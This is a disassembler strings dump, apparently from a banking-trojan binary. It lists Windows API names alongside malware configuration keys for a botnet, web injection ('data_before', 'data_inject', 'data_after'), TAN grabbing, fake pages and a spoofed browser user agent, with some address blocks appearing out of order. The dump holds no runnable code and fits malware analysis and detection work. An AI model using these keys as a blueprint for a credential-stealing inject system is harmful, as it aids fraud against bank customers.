.text:004064DC 0000000A C lstrcpynA
.text:004064E8 0000000A C lstrcpynW
.text:004064F4 00000009 C lstrcpyW
.text:00406500 0000000A C lstrcmpiA
.text:0040650C 0000000A C lstrcmpiW
.text:00406518 0000000D C ReleaseMutex
.text:00406528 0000000B C OpenMutexW
.text:00406534 0000000D C CreateMutexW
.text:00406544 0000000D C GetLastError
.text:00406554 00000011 C SetFilePointerEx
.text:00406568 00000013 C GetModuleFileNameA
.text:0040657C 00000013 C GetModuleFileNameW
.text:00406590 0000000A C CopyFileW
.text:0040659C 00000006 C Sleep
.text:004065A4 00000011 C GetModuleHandleA
.text:004065B8 00000019 C GetUserDefaultUILanguage
.text:004065D4 0000000E C GetVersionExW
.text:004065E4 00000017 C GetTimeZoneInformation
.text:004065FC 0000000B C ResetEvent
.text:0041E2C8 00000008 C CopySid
.text:0041E2D0 00000023 C ConvertSecurityDescriptorToAccessW
.text:0041E2F4 00000028 C ConvertSecurityDescriptorToAccessNamedW
.text:0041E31C 00000028 C ConvertSecurityDescriptorToAccessNamedA
.text:0041E344 00000023 C ConvertSecurityDescriptorToAccessA
.text:0041E368 00000023 C ConvertAccessToSecurityDescriptorW
.text:0041E38C 00000023 C ConvertAccessToSecurityDescriptorA
.text:0041E3B0 0000000F C ControlService
.text:0041E3C0 00000013 C CloseServiceHandle
.text:0041E3D4 0000000E C CloseEventLog
.text:0041E3E4 0000000F C ClearEventLogW
.text:0041E3F4 0000000F C ClearEventLogA
.text:0041E404 00000015 C ChangeServiceConfigW
.text:0041E41C 00000015 C ChangeServiceConfigA
.text:0041E434 00000017 C CancelOverlappedAccess
.text:0041E44C 00000015 C BuildTrusteeWithSidW
.text:0041E464 00000015 C BuildTrusteeWithSidA
.text:0041E47C 00000016 C BuildTrusteeWithNameW
.text:0041E494 00000016 C BuildTrusteeWithNameA
.text:0041E4AC 00000019 C BuildSecurityDescriptorW
.text:0041E4C8 00000019 C BuildSecurityDescriptorA
.text:0041E4E4 00000019 C BuildImpersonateTrusteeW
.text:0041E500 00000019 C BuildImpersonateTrusteeA
.text:0041E51C 00000028 C BuildImpersonateExplicitAccessWithNameW
.text:0041E544 00000028 C BuildImpersonateExplicitAccessWithNameA
.text:0041E56C 0000001D C BuildExplicitAccessWithNameW
.text:0041E58C 0000001D C BuildExplicitAccessWithNameA
.text:0041E5AC 00000010 C BackupEventLogW
.text:0041E5BC 00000010 C BackupEventLogA
.text:0041E5CC 00000016 C AreAnyAccessesGranted
.text:0041E5E4 00000016 C AreAllAccessesGranted
.text:0041E5FC 00000018 C AllocateLocallyUniqueId
.text:0041E614 00000019 C AllocateAndInitializeSid
.text:0041E630 00000016 C AdjustTokenPrivileges
.text:0041E648 00000012 C AdjustTokenGroups
.text:0041E65C 00000012 C AddAuditAccessAce
.text:0041E670 00000007 C AddAce
.text:0041E678 00000013 C AddAccessDeniedAce
.text:0041E68C 00000014 C AddAccessAllowedAce
.text:0041E6A0 0000001A C AccessCheckAndAuditAlarmW
.text:0041E6BC 0000001A C AccessCheckAndAuditAlarmA
.text:0041E6D8 0000000C C AccessCheck
.text:0041E6E4 00000015 C AbortSystemShutdownW
.text:0041E6FC 00000015 C AbortSystemShutdownA
.text:0041E714 0000000C C wvnsprintfW
.text:0041E720 0000000C C wvnsprintfA
.text:0041E72C 0000000B C wnsprintfW
.text:0041E738 0000000B C wnsprintfA
.text:0041E744 0000000D C UrlUnescapeW
.text:0041E754 0000000D C UrlUnescapeA
.text:0041E764 00000007 C UrlIsW
.text:0041E76C 0000000D C UrlIsOpaqueW
.text:0041E77C 0000000D C UrlIsOpaqueA
.text:0041E78C 00000010 C UrlIsNoHistoryW
.text:0041E79C 00000010 C UrlIsNoHistoryA
.text:0041E7AC 00000007 C UrlIsA
.text:0041E7B4 00000009 C UrlHashW
.text:0041E7C0 00000009 C UrlHashA
.text:0041E7CC 0000000C C UrlGetPartW
.text:0041E7D8 0000000C C UrlGetPartA
.text:0041E7E4 00000010 C UrlGetLocationW
.text:0041E7F4 00000010 C UrlGetLocationA
.text:0041E804 0000000B C UrlEscapeW
.text:0041E810 0000000B C UrlEscapeA
.text:0041E81C 00000013 C UrlCreateFromPathW
.text:0041E830 00000013 C UrlCreateFromPathA
.text:0041E844 0000000C C UrlCompareW
.text:0041E850 0000000C C UrlCompareA
.text:0041E85C 0000000C C UrlCombineW
.text:0041E868 0000000C C UrlCombineA
.text:00406608 00000010 C UnmapViewOfFile
.text:00406618 0000000E C MapViewOfFile
.text:00406628 00000013 C CreateFileMappingW
.text:0040663C 0000000E C GetFileSizeEx
.text:0040664C 0000000E C GetDriveTypeW
.text:0040665C 00000011 C GetLogicalDrives
.text:00406670 00000010 C GetCommandLineA
.text:00406680 0000000F C GetProcessHeap
.text:00406690 00000013 C GetFileAttributesW
.text:004066A4 0000000D C GetProcessId
.text:004066B4 0000000E C SuspendThread
.text:004066C4 0000000C C FreeLibrary
.text:004066D0 0000000B C OpenThread
.text:004066DC 0000000D C ResumeThread
.text:004066F8 00000005 C text
.text:00406700 00000011 C GetThreadContext
.text:00406714 00000016 C CreateTimerQueueTimer
.text:0040672C 00000016 C FileTimeToDosDateTime
.text:00406744 00000018 C FileTimeToLocalFileTime
.text:0040675C 0000001B C GetFileInformationByHandle
.text:00406778 00000017 C WaitForMultipleObjects
.text:00406790 00000022 C GetVolumeNameForVolumeMountPointW
.text:004067B4 00000014 C GetOverlappedResult
.text:004067C8 00000018 C GetEnvironmentVariableW
.text:004067E0 0000000A C LocalFree
.text:004067EC 0000000F C FormatMessageW
.text:00406FF8 00000012 C WTSQueryUserToken
.text:0040700C 0000000C C userenv.dll
.text:00407018 00000017 C CreateEnvironmentBlock
.text:00407030 00000018 C DestroyEnvironmentBlock
.text:00407070 00000011 C (kd;l;;;;;324j((
.text:004070BC 00000014 C DllUnregisterServer
.text:004070D0 00000012 C DllRegisterServer
.text:004070E4 00000012 C DllGetClassObject
.text:004070F8 00000010 C DllCanUnloadNow
.text:004072DC 0000000A C *<select
.text:004072E8 00000013 C *<option selected
.text:004072FC 00000011 C *<input *value=\"
.text:00407334 00000007 C %%0%uu
.text:004073AC 00000005 C pop3
.text:0040743C 00000038 C Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
.text:00407474 00000009 C HTTP/1.1
.text:00407480 0000000B C urlmon.dll
.text:0040748C 00000016 C ObtainUserAgentString
.text:004074B8 0000000C C cabinet.dll
.text:004074C4 0000000A C FCICreate
.text:004074D0 0000000B C FCIAddFile
.text:004074DC 00000010 C FCIFlushCabinet
.text:004074EC 0000000B C FCIDestroy
.text:00418920 0000000D C staticconfig
.text:00418998 00000007 C botnet
.text:004189E0 0000000D C timer_config
.text:00418A20 0000000B C timer_logs
.text:00418A58 0000000C C timer_stats
.text:00418A94 0000000B C url_config
.text:00418AF8 0000000B C url_compip
.text:00418B5C 0000000F C encryption_key
.text:00418BD8 00000014 C blacklist_languages
.text:00418C4C 00000007 C .data1
.text:00418C54 00000013 C percent_of_overlay
.text:00418C68 0000000E C dynamicconfig
.text:00418C78 0000000B C url_loader
.text:00418CF4 00000008 C set_url
.text:00418CFC 0000000E C data_before\r\n
.text:00418D0C 0000000E C data_inject\r\n
.text:00418D1C 0000000D C data_after\r\n
.text:00418D2C 0000000B C data_end\r\n
.text:00418E9C 0000000B C url_server
.text:00418F3C 0000000F C advancedconfig
.text:0041E874 00000011 C UrlCanonicalizeW
.text:0041E888 00000011 C UrlCanonicalizeA
.text:0041E89C 00000010 C UrlApplySchemeW
.text:0041E8AC 00000010 C UrlApplySchemeA
.text:0041E8BC 00000009 C StrTrimW
.text:0041E8C8 00000009 C StrTrimA
.text:0041E8D4 0000000A C StrToIntW
.text:0041E8E0 0000000C C StrToIntExW
.text:0041E8EC 0000000C C StrToIntExA
.text:0041E8F8 0000000A C StrToIntA
.text:0041E904 00000008 C StrStrW
.text:0041E90C 00000009 C StrStrIW
.text:0041E918 00000009 C StrStrIA
.text:0041E924 00000008 C StrStrA
.text:0041E92C 00000008 C StrSpnW
.text:0041E934 00000008 C StrSpnA
.text:0041E93C 0000000D C StrRetToStrW
.text:0041E94C 0000000D C StrRetToStrA
.text:0041E95C 0000000D C StrRetToBufW
.text:0041E96C 0000000D C StrRetToBufA
.text:0041E97C 0000000A C StrRStrIW
.text:0041E988 0000000A C StrRStrIA
.text:0041E994 00000009 C StrRChrW
.text:0041E9A0 0000000A C StrRChrIW
.text:0041E9AC 0000000A C StrRChrIA
.text:0041E9B8 00000009 C StrRChrA
.text:0041E9C4 00000009 C StrPBrkW
.text:0041E9D0 00000009 C StrPBrkA
.text:0041E9DC 00000009 C StrNCatW
.text:0041E9E8 00000009 C StrNCatA
.text:0041E9F4 00000010 C StrIsIntlEqualW
.text:0041EA04 00000010 C StrIsIntlEqualA
.text:0041EA14 00000015 C StrFromTimeIntervalW
.text:0041EA2C 00000015 C StrFromTimeIntervalA
.text:0041EA44 00000011 C StrFormatKBSizeW
.text:0041EA58 00000011 C StrFormatKBSizeA
.text:0041EA6C 00000013 C StrFormatByteSizeW
.text:0041EA80 00000013 C StrFormatByteSizeA
.text:0041EA94 00000015 C StrFormatByteSize64A
.text:0041EAAC 00000008 C StrDupW
.text:0041EAB4 00000008 C StrDupA
.text:0041EABC 00000008 C StrCpyW
.text:0041EAC4 00000009 C StrCpyNW
.text:0041EAD0 00000008 C StrCmpW
.text:0041EAD8 00000009 C StrCmpNW
.text:0041EAE4 0000000A C StrCmpNIW
.text:0041EAF0 0000000A C StrCmpNIA
.text:0041EAFC 00000009 C StrCmpNA
.text:0041EB08 00000009 C StrCmpIW
.text:0041EB14 00000008 C StrChrW
.text:0041EB1C 00000009 C StrChrIW
.text:0041EB28 00000009 C StrChrIA
.text:0041EB34 00000008 C StrChrA
.text:0041EB3C 00000008 C StrCatW
.text:0041EB44 0000000C C StrCatBuffW
.text:0041EB50 0000000C C StrCatBuffA
.text:0041EB5C 00000009 C StrCSpnW
.text:0041EB68 0000000A C StrCSpnIW
.text:0041EB74 0000000A C StrCSpnIA
.text:0041EB80 00000009 C StrCSpnA
.text:0041EB8C 0000000A C SHStrDupW
.text:0041EB98 0000000A C SHStrDupA
.text:0041EBA4 0000000F C SHSkipJunction
.text:0041EBB4 0000000C C SHSetValueW
.text:0041EBC0 0000000C C SHSetValueA
.text:0041EBCC 0000000F C SHSetThreadRef
.text:0041EBDC 00000013 C SHRegWriteUSValueW
.text:0041EBF0 00000013 C SHRegWriteUSValueA
.text:0041EC04 00000011 C SHRegSetUSValueW
.text:0041EC18 00000011 C SHRegSetUSValueA
.text:00418F4C 00000010 C advancedconfigs
.text:00418F8C 0000000A C webfilter
.text:00418F98 0000000B C webfilters
.text:00418FE0 0000000E C webdatafilter
.text:00418FF0 0000000F C webdatafilters
.text:00419000 00000009 C webfakes
.text:00419064 0000000B C tangrabber
.text:00419100 00000007 C dnsmap
.text:00419108 00000010 C file_webinjects
.text:00419584 00000005 C lexx
.text:00419644 0000000A C ole32.dll
.text:00419650 0000000C C SHLWAPI.dll
.text:0041965C 0000000D C ADVAPI32.dll
.text:0041966C 0000000B C USER32.dll
.text:00419678 0000000D C KERNEL32.dll
.text:00419688 00000012 C WriteStringStream
.text:0041969C 0000000C C WriteOleStg
.text:004196A8 00000014 C WriteFmtUserTypeStg
.text:004196BC 0000000E C WriteClassStm
.text:004196CC 0000000E C WriteClassStg
.text:004196DC 00000010 C UtGetDvtd32Info
.text:004196EC 00000010 C UtGetDvtd16Info
.text:004196FC 00000018 C UtConvertDvtd32toDvtd16
.text:00419714 00000018 C UtConvertDvtd16toDvtd32
.text:0041972C 00000013 C UpdateDCOMSettings
.text:00419740 0000000E C StringFromIID
.text:00419750 00000010 C StringFromGUID2
.text:00419760 00000010 C StringFromCLSID
.text:00419770 0000000C C StgSetTimes
.text:0041977C 0000001B C StgOpenStorageOnILockBytes
.text:00419798 00000011 C StgOpenStorageEx
.text:004197AC 0000000F C StgOpenStorage
.text:004197BC 00000024 C StgOpenAsyncDocfileOnIFillLockBytes
.text:004197E0 00000017 C StgIsStorageILockBytes
.text:004197F8 00000011 C StgIsStorageFile
.text:0041980C 00000021 C StgGetIFillLockBytesOnILockBytes
.text:00419830 0000001B C StgGetIFillLockBytesOnFile
.text:0041984C 00000013 C StgCreateStorageEx
.text:00419860 0000001D C StgCreateDocfileOnILockBytes
.text:00419880 00000011 C StgCreateDocfile
.text:00419894 00000012 C SetDocumentBitStg
.text:004198A8 0000000E C SetConvertStg
.text:004198B8 0000000F C RevokeDragDrop
.text:004198C8 00000011 C ReleaseStgMedium
.text:004198DC 00000011 C RegisterDragDrop
.text:004198F0 00000011 C ReadStringStream
.text:00419904 0000000B C ReadOleStg
.text:00419910 00000013 C ReadFmtUserTypeStg
.text:00419924 0000000D C ReadClassStm
.text:00419934 0000000D C ReadClassStg
.text:00419944 00000010 C PropVariantCopy
.text:00419954 00000011 C PropVariantClear
.text:00419968 00000010 C ProgIDFromCLSID
.text:00419978 00000013 C OpenOrCreateStream
.text:0041998C 00000010 C OleUninitialize
.text:0041999C 00000018 C OleTranslateAccelerator
.text:004199B4 00000015 C OleSetMenuDescriptor
.text:004199CC 00000016 C OleSetContainedObject
.text:004199E4 00000010 C OleSetClipboard
.text:004199F4 00000012 C OleSetAutoConvert
.text:00419A08 00000010 C OleSaveToStream
.text:00419A18 00000008 C OleSave
.text:00419A20 00000007 C OleRun
.text:00419A28 00000012 C OleRegGetUserType
.text:00419A3C 00000014 C OleRegGetMiscStatus
.text:00419A50 00000010 C OleRegEnumVerbs
.text:00419A60 00000014 C OleRegEnumFormatEtc
.text:00419A74 00000015 C OleQueryLinkFromData
.text:00419A8C 00000017 C OleQueryCreateFromData
.text:00419AA4 00000015 C OleNoteObjectVisible
.text:0041EC2C 00000013 C SHRegQueryUSValueW
.text:0041EC40 00000013 C SHRegQueryUSValueA
.text:0041EC54 00000015 C SHRegQueryInfoUSKeyW
.text:0041EC6C 00000015 C SHRegQueryInfoUSKeyA
.text:0041EC84 00000010 C SHRegOpenUSKeyW
.text:0041EC94 00000010 C SHRegOpenUSKeyA
.text:0041ECA4 00000011 C SHRegGetUSValueW
.text:0041ECB8 00000011 C SHRegGetUSValueA
.text:0041ECCC 00000015 C SHRegGetBoolUSValueW
.text:0041ECE4 00000015 C SHRegGetBoolUSValueA
.text:0041ECFC 00000012 C SHRegEnumUSValueW
.text:0041ED10 00000012 C SHRegEnumUSValueA
.text:0041ED24 00000010 C SHRegEnumUSKeyW
.text:0041ED34 00000010 C SHRegEnumUSKeyA
.text:0041ED44 00000013 C SHRegDuplicateHKey
.text:0041ED58 00000014 C SHRegDeleteUSValueW
.text:0041ED6C 00000014 C SHRegDeleteUSValueA
.text:0041ED80 00000017 C SHRegDeleteEmptyUSKeyW
.text:0041ED98 00000017 C SHRegDeleteEmptyUSKeyA
.text:0041EDB0 00000012 C SHRegCreateUSKeyW
.text:0041EDC4 00000012 C SHRegCreateUSKeyA
.text:0041EDD8 00000010 C SHRegCloseUSKey
.text:0041EDE8 00000010 C SHQueryValueExW
.text:0041EDF8 00000010 C SHQueryValueExA
.text:0041EE08 00000010 C SHQueryInfoKeyW
.text:0041EE18 00000010 C SHQueryInfoKeyA
.text:0041EE28 00000011 C SHOpenRegStreamW
.text:0041EE3C 00000011 C SHOpenRegStreamA
.text:0041EE50 00000012 C SHOpenRegStream2W
.text:0041EE64 00000012 C SHOpenRegStream2A
.text:0041EE78 00000015 C SHIsLowMemoryMachine
.text:0041EE90 0000000C C SHGetValueW
.text:0041EE9C 0000000C C SHGetValueA
.text:0041EEA8 0000000F C SHGetThreadRef
.text:0041EEB8 00000011 C SHGetInverseCMAP
.text:0041EECC 0000000D C SHEnumValueW
.text:0041EEDC 0000000D C SHEnumValueA
.text:0041EEEC 0000000D C SHEnumKeyExW
.text:0041EEFC 0000000D C SHEnumKeyExA
.text:0041EF0C 0000000F C SHDeleteValueW
.text:0041EF1C 0000000F C SHDeleteValueA
.text:0041EF2C 0000000D C SHDeleteKeyW
.text:0041EF3C 0000000D C SHDeleteKeyA
.text:0041EF4C 00000012 C SHDeleteEmptyKeyW
.text:0041EF60 00000012 C SHDeleteEmptyKeyA
.text:0041EF74 00000016 C SHCreateStreamOnFileW
.text:0041EF8C 00000016 C SHCreateStreamOnFileA
.text:0041EFA4 00000015 C SHCreateShellPalette
.text:0041EFBC 0000000B C SHCopyKeyW
.text:0041EFC8 0000000B C SHCopyKeyA
.text:0041EFD4 0000000F C SHAutoComplete
.text:0041EFE4 00000013 C PathUnquoteSpacesW
.text:0041EFF8 00000013 C PathUnquoteSpacesA
.text:0041F00C 00000018 C PathUnmakeSystemFolderW
.text:0041F024 00000018 C PathUnmakeSystemFolderA
.text:0041F03C 00000010 C PathUndecorateW
.text:0041F04C 00000010 C PathUndecorateA
.text:0041F05C 00000011 C PathStripToRootW
.text:0041F070 00000011 C PathStripToRootA
.text:0041F084 0000000F C PathStripPathW
.text:0041F094 0000000F C PathStripPathA
.text:0041F0A4 0000000E C PathSkipRootW
.text:0041F0B4 0000000E C PathSkipRootA
.text:0041F0C4 00000014 C PathSetDlgItemPathW
.text:0041F0D8 00000014 C PathSetDlgItemPathA
.text:0041F0EC 00000016 C PathSearchAndQualifyW
.text:0041F104 00000016 C PathSearchAndQualifyA
.text:0041F11C 00000015 C PathRenameExtensionW
.text:0041F134 00000015 C PathRenameExtensionA
.text:0041F14C 00000014 C PathRemoveFileSpecW
.text:00419ABC 00000020 C OleMetafilePictFromIconAndLabel
.text:00419ADC 0000000F C OleLockRunning
.text:00419AEC 00000012 C OleLoadFromStream
.text:00419B00 00000008 C OleLoad
.text:00419B08 0000000D C OleIsRunning
.text:00419B18 00000016 C OleIsCurrentClipboard
.text:00419B30 0000000E C OleInitialize
.text:00419B40 00000011 C OleGetIconOfFile
.text:00419B54 00000012 C OleGetIconOfClass
.text:00419B68 00000010 C OleGetClipboard
.text:00419B78 00000012 C OleGetAutoConvert
.text:00419B8C 00000012 C OleFlushClipboard
.text:00419BA0 00000011 C OleDuplicateData
.text:00419BB4 00000008 C OleDraw
.text:00419BBC 00000011 C OleDoAutoConvert
.text:00419BD0 00000019 C OleDestroyMenuDescriptor
.text:00419BEC 00000018 C OleCreateStaticFromData
.text:00419C04 00000018 C OleCreateMenuDescriptor
.text:00419C1C 00000016 C OleCreateLinkToFileEx
.text:00419C34 00000014 C OleCreateLinkToFile
.text:00419C48 00000018 C OleCreateLinkFromDataEx
.text:00419C60 00000016 C OleCreateLinkFromData
.text:00419C78 00000010 C OleCreateLinkEx
.text:00419C88 0000000E C OleCreateLink
.text:00419C98 00000014 C OleCreateFromFileEx
.text:00419CAC 00000012 C OleCreateFromFile
.text:00419CC0 00000014 C OleCreateFromDataEx
.text:00419CD4 00000012 C OleCreateFromData
.text:00419CE8 0000000C C OleCreateEx
.text:00419CF4 00000019 C OleCreateEmbeddingHelper
.text:00419D10 00000018 C OleCreateDefaultHandler
.text:00419D28 0000000A C OleCreate
.text:00419D34 00000020 C OleConvertOLESTREAMToIStorageEx
.text:00419D54 0000001E C OleConvertOLESTREAMToIStorage
.text:00419D74 00000020 C OleConvertIStorageToOLESTREAMEx
.text:00419D94 0000001E C OleConvertIStorageToOLESTREAM
.text:00419DB4 00000010 C OleBuildVersion
.text:00419DC4 00000016 C MonikerRelativePathTo
.text:00419DDC 00000018 C MonikerCommonPrefixWith
.text:00419DF4 00000013 C MkParseDisplayName
.text:00419E08 0000000C C IsEqualGUID
.text:00419E14 0000000E C IsAccelerator
.text:00419E24 0000000E C IIDFromString
.text:00419E34 00000016 C GetRunningObjectTable
.text:00419E4C 00000011 C GetHookInterface
.text:00419E60 00000015 C GetHGlobalFromStream
.text:00419E78 00000019 C GetHGlobalFromILockBytes
.text:00419E94 00000012 C GetDocumentBitStg
.text:00419EA8 0000000E C GetConvertStg
.text:00419EB8 0000000D C GetClassFile
.text:00419EC8 00000015 C FreePropVariantArray
.text:00419EE0 00000011 C EnableHookObject
.text:00419EF4 0000000B C DoDragDrop
.text:00419F00 00000016 C DllDebugObjectRPCHook
.text:00419F18 00000016 C CreateStreamOnHGlobal
.text:00419F30 00000015 C CreatePointerMoniker
.text:00419F48 00000016 C CreateOleAdviseHolder
.text:00419F60 00000014 C CreateObjrefMoniker
.text:00419F74 00000012 C CreateItemMoniker
.text:00419F88 0000001A C CreateILockBytesOnHGlobal
.text:00419FA4 00000017 C CreateGenericComposite
.text:00419FBC 00000012 C CreateFileMoniker
.text:00419FD0 00000010 C CreateDataCache
.text:00419FE0 00000017 C CreateDataAdviseHolder
.text:00419FF8 00000013 C CreateClassMoniker
.text:0041A00C 0000000E C CreateBindCtx
.text:0041A01C 00000012 C CreateAntiMoniker
.text:0041A030 00000015 C CoUnmarshalInterface
.text:0041A048 00000013 C CoUnmarshalHresult
.text:0041A05C 0000000F C CoUninitialize
.text:0041F160 00000014 C PathRemoveFileSpecA
.text:0041F174 00000015 C PathRemoveExtensionW
.text:0041F18C 00000015 C PathRemoveExtensionA
.text:0041F1A4 00000012 C PathRemoveBlanksW
.text:0041F1B8 00000012 C PathRemoveBlanksA
.text:0041F1CC 00000015 C PathRemoveBackslashW
.text:0041F1E4 00000015 C PathRemoveBackslashA
.text:0041F1FC 00000010 C PathRemoveArgsW
.text:0041F20C 00000010 C PathRemoveArgsA
.text:0041F21C 00000014 C PathRelativePathToW
.text:0041F230 00000014 C PathRelativePathToA
.text:0041F244 00000011 C PathQuoteSpacesW
.text:0041F258 00000011 C PathQuoteSpacesA
.text:0041F26C 00000017 C PathParseIconLocationW
.text:0041F284 00000017 C PathParseIconLocationA
.text:0041F29C 0000000F C PathMatchSpecW
.text:0041F2AC 0000000F C PathMatchSpecA
.text:0041F2BC 00000016 C PathMakeSystemFolderW
.text:0041F2D4 00000016 C PathMakeSystemFolderA
.text:0041F2EC 00000010 C PathMakePrettyW
.text:0041F2FC 00000010 C PathMakePrettyA
.text:0041F30C 0000000B C PathIsURLW
.text:0041F318 0000000B C PathIsURLA
.text:0041F324 0000000B C PathIsUNCW
.text:0041F330 00000011 C PathIsUNCServerW
.text:0041F344 00000016 C PathIsUNCServerShareW
.text:0041F35C 00000016 C PathIsUNCServerShareA
.text:0041F374 00000011 C PathIsUNCServerA
.text:0041F388 0000000B C PathIsUNCA
.text:0041F394 00000014 C PathIsSystemFolderW
.text:0041F3A8 00000014 C PathIsSystemFolderA
.text:0041F3BC 00000010 C PathIsSameRootW
.text:0041F3CC 00000010 C PathIsSameRootA
.text:0041F3DC 0000000C C PathIsRootW
.text:0041F3E8 0000000C C PathIsRootA
.text:0041F3F4 00000010 C PathIsRelativeW
.text:0041F404 00000010 C PathIsRelativeA
.text:0041F414 0000000E C PathIsPrefixW
.text:0041F424 0000000E C PathIsPrefixA
.text:0041F434 00000013 C PathIsNetworkPathW
.text:0041F448 00000013 C PathIsNetworkPathA
.text:0041F45C 00000013 C PathIsLFNFileSpecW
.text:0041F470 00000013 C PathIsLFNFileSpecA
.text:0041F484 00000010 C PathIsFileSpecW
.text:0041F494 00000010 C PathIsFileSpecA
.text:0041F4A4 00000011 C PathIsDirectoryW
.text:0041F4B8 00000016 C PathIsDirectoryEmptyW
.text:0041F4D0 00000016 C PathIsDirectoryEmptyA
.text:0041F4E8 00000011 C PathIsDirectoryA
.text:0041F4FC 00000013 C PathIsContentTypeW
.text:0041F510 00000013 C PathIsContentTypeA
.text:0041F524 00000014 C PathGetDriveNumberW
.text:0041F538 00000014 C PathGetDriveNumberA
.text:0041F54C 00000011 C PathGetCharTypeW
.text:0041F560 00000011 C PathGetCharTypeA
.text:0041F574 0000000D C PathGetArgsW
.text:0041F584 0000000D C PathGetArgsA
.text:0041F594 00000015 C PathFindSuffixArrayW
.text:0041F5AC 00000015 C PathFindSuffixArrayA
.text:0041F5C4 00000010 C PathFindOnPathW
.text:0041F5D4 00000010 C PathFindOnPathA
.text:0041F5E4 00000017 C PathFindNextComponentW
.text:0041F5FC 00000017 C PathFindNextComponentA
.text:0041F614 00000012 C PathFindFileNameW
.text:0041F628 00000012 C PathFindFileNameA
.text:0041F63C 00000013 C PathFindExtensionW
.text:0041F650 00000013 C PathFindExtensionA
.text:0041F664 00000010 C PathFileExistsW
.text:0041F674 00000010 C PathFileExistsA
.text:0041F684 00000013 C PathCreateFromUrlW
.text:0041A06C 0000000F C CoTreatAsClass
.text:0041A07C 00000011 C CoTaskMemRealloc
.text:0041A090 0000000E C CoTaskMemFree
.text:0041A0A0 0000000F C CoTaskMemAlloc
.text:0041A0B0 00000014 C CoSwitchCallContext
.text:0041A0C4 00000016 C CoSuspendClassObjects
.text:0041A0DC 00000012 C CoSetProxyBlanket
.text:0041A0F0 00000012 C CoRevokeMallocSpy
.text:0041A104 00000014 C CoRevokeClassObject
.text:0041A118 0000000F C CoRevertToSelf
.text:0041A128 00000015 C CoResumeClassObjects
.text:0041A140 00000017 C CoReleaseServerProcess
.text:0041A158 00000015 C CoReleaseMarshalData
.text:0041A170 00000014 C CoRegisterSurrogate
.text:0041A184 00000012 C CoRegisterPSClsid
.text:0041A198 00000018 C CoRegisterMessageFilter
.text:0041A1B0 00000014 C CoRegisterMallocSpy
.text:0041A1C4 00000016 C CoRegisterClassObject
.text:0041A1DC 00000016 C CoRegisterChannelHook
.text:0041A1F4 00000015 C CoQueryReleaseObject
.text:0041A20C 00000014 C CoQueryProxyBlanket
.text:0041A220 00000015 C CoQueryClientBlanket
.text:0041A238 0000001E C CoQueryAuthenticationServices
.text:0041A258 00000013 C CoMarshalInterface
.text:0041A26C 00000026 C CoMarshalInterThreadInterfaceInStream
.text:0041A294 00000011 C CoMarshalHresult
.text:0041A2A8 00000015 C CoLockObjectExternal
.text:0041A2C0 0000000E C CoLoadLibrary
.text:0041A2D0 0000000E C CoIsOle1Class
.text:0041A2E0 00000015 C CoIsHandlerConnected
.text:0041A2F8 00000015 C CoInitializeSecurity
.text:0041A310 0000000F C CoInitializeEx
.text:0041A320 0000000D C CoInitialize
.text:0041A330 00000014 C CoImpersonateClient
.text:0041A344 00000012 C CoGetTreatAsClass
.text:0041A358 00000015 C CoGetStandardMarshal
.text:0041A370 0000000D C CoGetPSClsid
.text:0041A380 0000000C C CoGetObject
.text:0041A38C 00000014 C CoGetMarshalSizeMax
.text:0041A3A0 0000000C C CoGetMalloc
.text:0041A3AC 0000001F C CoGetInterfaceAndReleaseStream
.text:0041A3CC 0000001A C CoGetInstanceFromIStorage
.text:0041A3E8 00000016 C CoGetInstanceFromFile
.text:0041A400 00000014 C CoGetCurrentProcess
.text:0041A414 0000001C C CoGetCurrentLogicalThreadId
.text:0041A430 00000011 C CoGetClassObject
.text:0041A444 0000000F C CoGetCallerTID
.text:0041A454 00000011 C CoGetCallContext
.text:0041A468 00000016 C CoFreeUnusedLibraries
.text:0041A480 0000000E C CoFreeLibrary
.text:0041A490 00000013 C CoFreeAllLibraries
.text:0041A4A4 00000018 C CoFileTimeToDosDateTime
.text:0041A4BC 0000000E C CoFileTimeNow
.text:0041A4CC 00000018 C CoDosDateTimeToFileTime
.text:0041A4E4 00000013 C CoDisconnectObject
.text:0041A4F8 00000013 C CoCreateInstanceEx
.text:0041A50C 00000011 C CoCreateInstance
.text:0041A520 0000000D C CoCreateGuid
.text:0041A530 0000001E C CoCreateFreeThreadedMarshaler
.text:0041A550 0000000C C CoCopyProxy
.text:0041A55C 0000000F C CoBuildVersion
.text:0041A56C 00000016 C CoAddRefServerProcess
.text:0041A584 00000010 C CLSIDFromString
.text:0041A594 00000010 C CLSIDFromProgID
.text:0041A5A4 0000000C C BindMoniker
.text:0041A5B0 00000010 C WindowFromPoint
.text:0041A5C0 0000000D C WindowFromDC
.text:0041A5D0 00000009 C WinHelpW
.text:0041A5DC 00000009 C WinHelpA
.text:0041A5E8 0000000C C WaitMessage
.text:0041F698 00000013 C PathCreateFromUrlA
.text:0041F6AC 00000011 C PathCompactPathW
.text:0041F6C0 00000013 C PathCompactPathExW
.text:0041F6D4 00000013 C PathCompactPathExA
.text:0041F6E8 00000011 C PathCompactPathA
.text:0041F6FC 00000012 C PathCommonPrefixW
.text:0041F710 00000012 C PathCommonPrefixA
.text:0041F724 0000000D C PathCombineW
.text:0041F734 0000000D C PathCombineA
.text:0041F744 00000012 C PathCanonicalizeW
.text:0041F758 00000012 C PathCanonicalizeA
.text:0041F76C 0000000F C PathBuildRootW
.text:0041F77C 0000000F C PathBuildRootA
.text:0041F78C 0000000C C PathAppendW
.text:0041F798 0000000C C PathAppendA
.text:0041F7A4 00000012 C PathAddExtensionW
.text:0041F7B8 00000012 C PathAddExtensionA
.text:0041F7CC 00000012 C PathAddBackslashW
.text:0041F7E0 00000012 C PathAddBackslashA
.text:0041F7F4 00000011 C IntlStrEqWorkerW
.text:0041F808 00000011 C IntlStrEqWorkerA
.text:0041F81C 00000009 C HashData
.text:0041F828 00000011 C GetMenuPosFromID
.text:0041F83C 0000000E C ColorRGBToHLS
.text:0041F84C 0000000E C ColorHLSToRGB
.text:0041F85C 00000010 C ColorAdjustLuma
.text:0041F86C 00000009 C ChrCmpIW
.text:0041F878 00000009 C ChrCmpIA
.text:0041F884 00000012 C AssocQueryStringW
.text:0041F898 00000017 C AssocQueryStringByKeyW
.text:0041F8B0 00000017 C AssocQueryStringByKeyA
.text:0041F8C8 00000012 C AssocQueryStringA
.text:0041F8DC 0000000F C AssocQueryKeyW
.text:0041F8EC 0000000F C AssocQueryKeyA
.text:0041F8FC 00000009 C lstrlenW
.text:0041F908 00000009 C lstrlenA
.text:0041F914 00000008 C lstrlen
.text:0041F91C 0000000A C lstrcpynW
.text:0041F928 0000000A C lstrcpynA
.text:0041F934 00000009 C lstrcpyn
